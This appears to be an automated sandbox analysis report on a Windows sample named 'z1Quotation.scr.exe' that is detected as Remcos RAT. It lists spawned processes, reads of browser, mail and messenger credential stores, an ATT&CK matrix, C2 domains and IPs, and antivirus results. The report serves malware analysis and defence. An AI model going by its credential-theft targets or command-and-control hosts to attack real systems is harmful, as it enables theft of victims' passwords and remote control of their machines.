                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txtJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"Jump to behavior
                Source: z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968438637.0000000007488000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978936796.0000000007488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: z1Quotation.scr.exe, 00000082.00000003.35978936796.0000000007488000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988752438.0000000007488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager"
                Source: z1Quotation.scr.exe, 00000082.00000003.35968794940.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991202437.00000000073F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerO
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\igdlh.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem23.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem24.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem22.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem15.cat VolumeInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,137_2_0041881C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,138_2_004082CD
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004034D1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034D1
                Source: C:\Windows\SysWOW64\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite-wal
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite-shm
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: EntryPoint, ESMTPPassword138_2_004033F0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword138_2_00402DB3
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword138_2_00402DB3
                Yara detected BrowsingHistoryView browser history reader tool
                Source: Yara matchFile source: 140.2.z1Quotation.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 140.2.z1Quotation.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000008C.00000002.36509511110.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZLUOGZJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                Windows Management Instrumentation                		1
                LSASS Driver                		1
                LSASS Driver                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		11
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts21
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		2
                Obfuscated Files or Information                		1
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts12
                Command and Scripting Interpreter                		1
                Registry Run Keys / Startup Folder                		1
                Access Token Manipulation                		2
                Software Packing                		2
                Credentials in Registry                		3
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook112
                Process Injection                		1
                DLL Side-Loading                		1
                Credentials In Files                		139
                System Information Discovery                		Distributed Component Object Model1
                Input Capture                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                Registry Run Keys / Startup Folder                		1
                Masquerading                		LSA Secrets331
                Security Software Discovery                		SSH2
                Clipboard Data                		2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
                Virtualization/Sandbox Evasion                		Cached Domain Credentials13
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture13
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Time Based Evasion                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                Time Based Evasion                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522580 Sample: z1Quotation.scr.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 55 subddfg.lol 2->55 57 telesavers.co.za 2->57 59 geoplugin.net 2->59 65 Multi AV Scanner detection for domain / URL 2->65 67 Suricata IDS alerts for network traffic 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 6 other signatures 2->71 8 z1Quotation.scr.exe 1 34 2->8         started        12 mstee.sys 2->12         started        14 mskssrv.sys 2->14         started        signatures3 process4 file5 45 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->45 dropped 47 C:\Users\user\AppData\Local\...\System.dll, PE32 8->47 dropped 73 Detected unpacking (changes PE section rights) 8->73 75 Detected unpacking (overwrites its own PE header) 8->75 77 Tries to steal Mail credentials (via file registry) 8->77 79 3 other signatures 8->79 16 z1Quotation.scr.exe 3 15 8->16         started        20 cmd.exe 8->20         started        22 cmd.exe 8->22         started        24 62 other processes 8->24 signatures6 process7 dnsIp8 49 subddfg.lol 23.106.238.209, 2404, 49761, 49763 LEASEWEB-USA-SFO-12US United Kingdom 16->49 51 telesavers.co.za 102.65.21.26, 443, 49760 Web-Africa-Networks-ASZA South Africa 16->51 53 geoplugin.net 178.237.33.50, 49762, 80 ATOM86-ASATOM86NL Netherlands 16->53 61 Detected Remcos RAT 16->61 63 Maps a DLL or memory area into another process 16->63 26 dxdiag.exe 16->26         started        29 z1Quotation.scr.exe 16->29         started        31 z1Quotation.scr.exe 16->31         started        41 6 other processes 16->41 33 Conhost.exe 20->33         started        35 Conhost.exe 22->35         started        37 Conhost.exe 24->37         started        39 Conhost.exe 24->39         started        43 60 other processes 24->43 signatures9 process10 signatures11 81 Query firmware table information (likely to detect VMs) 26->81 83 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 26->83 85 Tries to steal Instant Messenger accounts or passwords 29->85 87 Tries to steal Mail credentials (via file / registry access) 29->87 89 Tries to harvest and steal browser information (history, passwords, etc) 41->89

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                z1Quotation.scr.exe18%VirustotalBrowse
                z1Quotation.scr.exe11%ReversingLabs
                z1Quotation.scr.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                telesavers.co.za14%VirustotalBrowse
                geoplugin.net0%VirustotalBrowse
                subddfg.lol0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://geoplugin.net/json.gpB_3%VirustotalBrowse
                http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
                http://crl.quovadisglobal.com/qvicag4.crl00%VirustotalBrowse
                http://trust.quovadisglobal.com/qvrca.crt00%VirustotalBrowse
                http://pki.intel.com/crt/IntelCA7B.crt00%VirustotalBrowse
                http://www.imvu.com0%VirustotalBrowse
                http://trust.quovadisglobal.com/qvicag4.crt00%VirustotalBrowse
                http://pki.intel.com/crl/IntelCA7B.crl0f0%VirustotalBrowse
                http://geoplugin.net/json.gp6%VirustotalBrowse
                http://www.quovadisglobal.com/repository00%VirustotalBrowse
